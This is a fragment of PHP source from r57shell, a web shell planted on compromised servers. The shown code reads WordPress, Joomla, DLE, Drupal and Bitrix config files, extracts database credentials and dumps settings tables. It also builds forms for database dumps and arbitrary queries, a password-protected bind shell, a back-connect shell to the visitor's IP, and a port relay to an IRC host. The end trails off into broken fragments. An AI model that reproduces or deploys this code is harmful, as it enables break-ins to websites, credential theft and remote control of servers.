';if(is_file($dir."/wp-config.php")){$cmsFileSett=file_get_contents($dir."/wp-config.php");print "WordPress\r\n\r\n";preg_match('%\$table_prefix[^\']+\'(.+?)\'%i',$cmsFileSett,$cmsSettMatche);preg_match_all('%define$\'(.+)\', \'(.*)\'$;%i',$cmsFileSett,$cmsSettMatches,PREG_SET_ORDER);$cmsResult=array();if(isset($cmsSettMatche[1 ]) && $cmsSettMatches>=4 ){foreach($cmsSettMatches as $cmsSettMatchesKey=>$cmsSettMatchesVal){$cmsResult[$cmsSettMatchesVal[1 ]]=$cmsSettMatchesVal[2 ];}if(isset($cmsResult['DB_NAME']) && isset($cmsResult['DB_USER']) && isset($cmsResult['DB_PASSWORD']) && isset($cmsResult['DB_HOST'])){$db=new dbmysql($cmsResult['DB_HOST'],$cmsResult['DB_USER'],$cmsResult['DB_PASSWORD'],$cmsResult['DB_NAME']);$query=$db->queryArr("SELECT `option_name`,`option_value` FROM `".$cmsSettMatche[1 ]."options`");$cmsQuery=array();foreach($query as $queryKey=>$queryVal){$cmsQuery[$queryVal['option_name']]=$queryVal['option_value'];}print_r($cmsQuery);}}}if(is_file($dir."/configuration.php")){$cmsFileSett=file_get_contents($dir."/configuration.php");print "Joomla\r\n\r\n";print iconv("utf-8","windows-1251",$cmsFileSett);}if(is_file($dir."/engine/data/config.php")){$cmsFileSett=file_get_contents($dir."/engine/data/config.php");print "DLE\r\n\r\n";print str_replace(array("\r\n\r\n","\n\n"),array("\r\n","\n"),$cmsFileSett);}if(is_file($dir."/sites/default/settings.php")){$cmsFileSett=file_get_contents($dir."/sites/default/settings.php");print "Drupal\r\n\r\n";$cmsResult=array();preg_match('%\'database\'[^\*\']+\'([^\']*)\'[^\*]+\'username\'[^\*\']+\'([^\']*)\'[^\*]+\'password\'[^\*\']+\'([^\']*)\'[^\*]+\'host\'[^\*\']+\'([^\']*)\'[^\*]+\'prefix\'[^\*\']+\'([^\']*)\'%is',$cmsFileSett,$cmsSettMatches);if(count($cmsSettMatches)==6 ){$cmsResult['host']=$cmsSettMatches[4 ];$cmsResult['user']=$cmsSettMatches[2 ];$cmsResult['pwd']=$cmsSettMatches[3 ];$cmsResult['db']=$cmsSettMatches[1 ];$cmsResult['prefix']=$cmsSettMatches[5 ];}else {preg_match('%\$db_url = \'[a-z]+://(.+?)@(.+?)/(.+?)\';[^*]+\$db_prefix = \'([^\']*)\';%i',$cmsFileSett,$cmsSettMatches);if(count($cmsSettMatches)==5 ){$userPwd=explode(":",$cmsSettMatches[1 ]);if(!isset($userPwd[1 ])){$userPwd[1 ]='';}$cmsResult['host']=$cmsSettMatches[2 ];$cmsResult['user']=$userPwd[0 ];$cmsResult['pwd']=$userPwd[1 ];$cmsResult['db']=$cmsSettMatches[3 ];$cmsResult['prefix']=$cmsSettMatches[4 ];}}if(count($cmsResult)==5 ){$db=new dbmysql($cmsResult['host'],$cmsResult['user'],$cmsResult['pwd'],$cmsResult['db']);$query=$db->queryArr("SELECT `name`,`value` FROM `".$cmsResult['prefix']."variable`");$cmsQuery=array();foreach($query as $queryKey=>$queryVal){$cmsQuery[$queryVal['name']]=$queryVal['value'];}print_r($cmsQuery);$query=$db->queryArr("SELECT * FROM `".$cmsResult['prefix']."watchdog` LIMIT 1");print_r($query);}}if(is_file($dir."/bitrix/php_interface/dbconn.php")){$cmsFileSett=file_get_contents($dir."/bitrix/php_interface/dbconn.php");print "Bitrix\r\n\r\n";preg_match('%\$DBHost[^"]+"([^"]*).+?\n\$DBLogin[^"]+"([^"]*).+\n\$DBPassword[^"]+"([^"]*).+\n\$DBName[^"]+"([^"]*)"%is',$cmsFileSett,$cmsSettMatches);$cmsResult=array();if(count($cmsSettMatches)==5 ){$cmsResult['host']=$cmsSettMatches[1 ];$cmsResult['user']=$cmsSettMatches[2 ];$cmsResult['pwd']=$cmsSettMatches[3 ];$cmsResult['db']=$cmsSettMatches[4 ];$db=new dbmysql($cmsResult['host'],$cmsResult['user'],$cmsResult['pwd'],$cmsResult['db']);$query=$db->queryArr("SELECT `NAME`,`VALUE` FROM `b_option` WHERE `MODULE_ID` = 'main'");$cmsQuery=array();foreach($query as $queryKey=>$queryVal){$cmsQuery[$queryVal['NAME']]=$queryVal['VALUE'];}print_r($cmsQuery);}}print '';}print "
".$table_end1.$fe;if($mysql_on || $mssql_on || $pg_on || $ora_on){$select='';echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."".$fs."".$fe.$fs."".$fe.$fs."".$fe."
".$ts;echo "".$lang[$language.'_text77']."
";echo sr(45 ,"".$lang[$language.'_text80'].$arrow."",$select);echo sr(45 ,"".$lang[$language.'_text14'].$arrow."",in('text','db_port',15 ,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));echo sr(45 ,"".$lang[$language.'_text37'].$arrow."",in('text','mysql_l',15 ,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));echo sr(45 ,"".$lang[$language.'_text38'].$arrow."",in('text','mysql_p',15 ,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));echo sr(45 ,"".$lang[$language.'_text78'].$arrow."",in('hidden','dir',0 ,$dir).in('hidden','cmd',0 ,'db_show').in('checkbox','st id=st',0 ,'1'));echo sr(45 ,"".$lang[$language.'_text79'].$arrow."",in('checkbox','sc id=sc',0 ,'1'));echo sr(45 ,"",in('submit','submit',0 ,$lang[$language.'_butt7']));echo $te." ".$ts;echo "".$lang[$language.'_text40']."
";echo sr(45 ,"".$lang[$language.'_text80'].$arrow."",$select);echo sr(45 ,"".$lang[$language.'_text14'].$arrow."",in('text','db_port',15 ,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));echo sr(45 ,"".$lang[$language.'_text37'].$arrow."",in('text','mysql_l',15 ,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));echo sr(45 ,"".$lang[$language.'_text38'].$arrow."",in('text','mysql_p',15 ,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));echo sr(45 ,"".$lang[$language.'_text36'].$arrow."",in('text','mysql_db',15 ,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));echo sr(45 ,"".$lang[$language.'_text39'].$arrow."",in('text','mysql_tbl',15 ,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));echo sr(45 ,in('hidden','dir',0 ,$dir).in('hidden','cmd',0 ,'mysql_dump')."".$lang[$language.'_text41'].$arrow."",in('checkbox','dif id=dif',0 ,'1'));echo sr(45 ,"".$lang[$language.'_text59'].$arrow."",in('text','dif_name',15 ,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));echo sr(45 ,"",in('submit','submit',0 ,$lang[$language.'_butt9']));echo $te." ".$ts;echo "".$lang[$language.'_text83']."
";echo sr(45 ,"".$lang[$language.'_text80'].$arrow."",$select);echo sr(45 ,"".$lang[$language.'_text14'].$arrow."",in('text','db_port',15 ,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));echo sr(45 ,"".$lang[$language.'_text37'].$arrow."",in('text','mysql_l',15 ,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));echo sr(45 ,"".$lang[$language.'_text38'].$arrow."",in('text','mysql_p',15 ,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));echo sr(45 ,"".$lang[$language.'_text36'].$arrow."",in('text','mysql_db',15 ,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));echo sr(45 ,"".$lang[$language.'_text84'].$arrow."".in('hidden','dir',0 ,$dir).in('hidden','cmd',0 ,'db_query'),"");echo $te."
".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."
".in('submit','submit',0 ,$lang[$language.'_butt1'])."
";}if(!$safe_mode && !$windows){echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."".$fs."".$ts;echo "".$lang[$language.'_text9']."
";echo sr(40 ,"".$lang[$language.'_text10'].$arrow."",in('text','port',15 ,'11457'));echo sr(40 ,"".$lang[$language.'_text11'].$arrow."",in('text','bind_pass',15 ,'r57'));echo sr(40 ,"".$lang[$language.'_text20'].$arrow."","".in('hidden','dir',0 ,$dir));echo sr(40 ,"",in('submit','submit',0 ,$lang[$language.'_butt3']));echo $te."".$fe.$fs."".$ts;echo "".$lang[$language.'_text12']."
";echo sr(40 ,"".$lang[$language.'_text13'].$arrow."",in('text','ip',15 ,((getenv('REMOTE_ADDR'))?(getenv('REMOTE_ADDR')):("127.0.0.1"))));echo sr(40 ,"".$lang[$language.'_text14'].$arrow."",in('text','port',15 ,'11457'));echo sr(40 ,"".$lang[$language.'_text20'].$arrow."","".in('hidden','dir',0 ,$dir));echo sr(40 ,"",in('submit','submit',0 ,$lang[$language.'_butt4']));echo $te."".$fe.$fs."".$ts;echo "".$lang[$language.'_text22']."
";echo sr(40 ,"".$lang[$language.'_text23'].$arrow."",in('text','local_port',15 ,'11457'));echo sr(40 ,"".$lang[$language.'_text24'].$arrow."",in('text','remote_host',15 ,'irc.dalnet.ru'));echo sr(40 ,"".$lang[$language.'_text25'].$arrow."",in('text','remote_port',15 ,'6667'));echo sr(40 ,"".$lang[$language.'_text26'].$arrow."","".in('hidden','dir',0 ,$dir));echo sr(40 ,"",in('submit','submit',0 ,$lang[$language.'_butt5']));echo $te."".$fe."";}echo ''.$table_up3."
[ r57shell by RST/GHC/Staf4 | version ".$version." ]
";exit();

Directive	Local Value	Master Value
'.ws(3 ).''.$key.'	'.U_value($value['local_value']).'	'.U_value($value['global_value']).'

'.ws(3 ).''.trim($info[0 ]).'	'.trim($info[1 ]).'
'.ws(3 ).' ---

".ws(3 );$r.=($windows)?str_replace("/","\\",$file):$file;$r.="";$r.="
".$a."	".ws(2 ).$b."